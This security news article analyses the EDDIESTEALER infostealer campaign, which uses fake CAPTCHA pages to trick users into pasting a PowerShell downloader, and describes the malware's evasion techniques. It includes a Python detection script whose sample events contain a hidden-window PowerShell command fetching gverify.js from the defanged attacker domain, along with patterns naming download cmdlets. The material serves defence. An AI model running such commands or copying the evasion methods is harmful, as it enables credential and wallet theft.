Cybersecurity researchers have uncovered a sophisticated malware campaign leveraging deceptive CAPTCHA verification pages to distribute a newly discovered Rust-based infostealer dubbed EDDIESTEALER.
This campaign represents a significant evolution in social engineering tactics, where threat actors exploit users’ familiarity with routine security verification processes to trick them into executing malicious code.
The malware employs an intricate multi-stage delivery mechanism that begins with compromised websites displaying convincing fake “I’m not a robot” verification screens, ultimately leading to the deployment of a powerful data-stealing tool capable of harvesting credentials, browser information, and cryptocurrency wallet details.
The attack vector demonstrates remarkable sophistication in its execution methodology. Initial access occurs through compromised websites that deploy obfuscated React-based JavaScript payloads, presenting users with what appears to be a legitimate Google reCAPTCHA verification interface.
These fake verification screens instruct users to perform seemingly innocuous actions: pressing Windows Key + R to open the Run dialog, followed by Ctrl + V to paste clipboard contents, and finally Enter to execute the command.
Unbeknownst to the victim, the malicious JavaScript has already copied a PowerShell command to their clipboard using the document.execCommand("copy") method.
Elastic Security Labs analysts identified this emerging threat through comprehensive telemetry analysis, discovering that the campaign leverages a sophisticated command structure that silently downloads secondary payloads from attacker-controlled infrastructure.
The PowerShell command automatically retrieves a JavaScript file named “gverify.js” from domains such as hxxps://1111.fit/version/, which subsequently downloads the main EDDIESTEALER executable with a pseudorandomly generated 12-character filename.
This multi-layered approach effectively obscures the true nature of the attack while maintaining the appearance of legitimate system verification processes.
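As an added example (not code from the article or from Elastic Security Labs), the following Python triage check scores constructed Sysmon-style process-creation events for the Run-dialog pattern described above: a script interpreter launched from explorer.exe whose command line carries a download cmdlet, a URL, a hidden-window switch or a .js reference. The log format, field names and sample lines are assumptions made for the example.

```python
import re

# Constructed Sysmon-style process-creation events (made up for this example,
# not telemetry from the campaign). The format is "Field=value|Field=value";
# splitting on "|" is only safe because these samples contain no pipes.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\notepad.exe|CommandLine=notepad.exe notes.txt",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -w hidden -c Invoke-WebRequest hxxps://1111.fit/version/gverify.js",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell",
    "ParentImage=C:\\Program Files\\Microsoft VS Code\\Code.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell -File build.ps1",
]

# Interpreters that a pasted Win+R command typically lands in.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
DOWNLOAD_RE = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|wget)\b", re.I)
URL_RE = re.compile(r"\bh(?:xx|tt)ps?://", re.I)          # accepts defanged hxxp(s) as well
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-ep\s+bypass", re.I)

def parse_event(line):
    return dict(field.split("=", 1) for field in line.split("|"))

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (score, reasons); each matched indicator adds one point."""
    reasons = []
    if basename(ev.get("ParentImage", "")) == "explorer.exe" and basename(ev.get("Image", "")) in INTERPRETERS:
        reasons.append("interpreter spawned by explorer.exe (Run dialog / shell)")
    else:
        return 0, reasons  # not launched from the shell: not this pattern
    cmd = ev.get("CommandLine", "")
    if DOWNLOAD_RE.search(cmd): reasons.append("download cmdlet in command line")
    if URL_RE.search(cmd): reasons.append("URL in command line")
    if HIDDEN_RE.search(cmd): reasons.append("hidden-window or policy-bypass switch")
    if re.search(r"\.js\b", cmd, re.I): reasons.append("references a .js payload")
    return len(reasons), reasons

def flag_events(lines, threshold=3):
    """Return (image, score, reasons) for every event at or above the threshold."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((basename(ev["Image"]), score, reasons))
    return hits
```

A bare `powershell` launched from the Run dialog scores 1 and stays below the threshold, so the check flags the download chain rather than every interactive shell.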
The malware’s impact extends far beyond simple credential theft, targeting a comprehensive range of sensitive data including cryptocurrency wallets, browser stored credentials, password manager databases, FTP client configurations, and messaging applications.
EDDIESTEALER demonstrates particular sophistication in its approach to modern browser security, implementing techniques similar to ChromeKatz to bypass Application-bound encryption protections introduced in recent Chrome versions.
The malware’s ability to adapt to evolving security measures highlights the persistent threat posed by well-resourced cybercriminal organizations.
Advanced Evasion and Persistence Mechanisms
EDDIESTEALER employs multiple layers of obfuscation and evasion techniques that distinguish it from conventional infostealers.
The malware utilizes extensive string encryption through XOR ciphers, with each decryption routine employing a distinct key derivation function that takes an address within the binary and a 4-byte constant and uses them to calculate where the XOR key is located.
This approach significantly complicates static analysis efforts, as researchers must reverse-engineer multiple custom decryption algorithms to extract meaningful artifacts.
The malware implements sophisticated API obfuscation through a custom Windows API lookup mechanism. Rather than relying on standard import tables, EDDIESTEALER dynamically resolves function addresses by maintaining a local hashtable of previously resolved API calls.
When a new function is required, the malware employs custom LoadLibrary and GetProcAddress implementations to retrieve addresses, subsequently caching them for future use.
This technique effectively evades signature-based detection systems that rely on import table analysis.
EDDIESTEALER incorporates multiple anti-analysis features, including memory-based sandbox detection that evaluates total physical memory to determine if the system meets minimum requirements of approximately 4.0 GB.
Additionally, newer variants suggest server-side profiling capabilities, where the command and control infrastructure can assess client environments and withhold malicious payloads when sandbox or analysis systems are detected.
The malware also implements self-deletion capabilities using NTFS Alternate Data Streams renaming techniques, similar to those observed in LATRODECTUS campaigns, enabling the executable to remove itself from disk while bypassing file lock restrictions.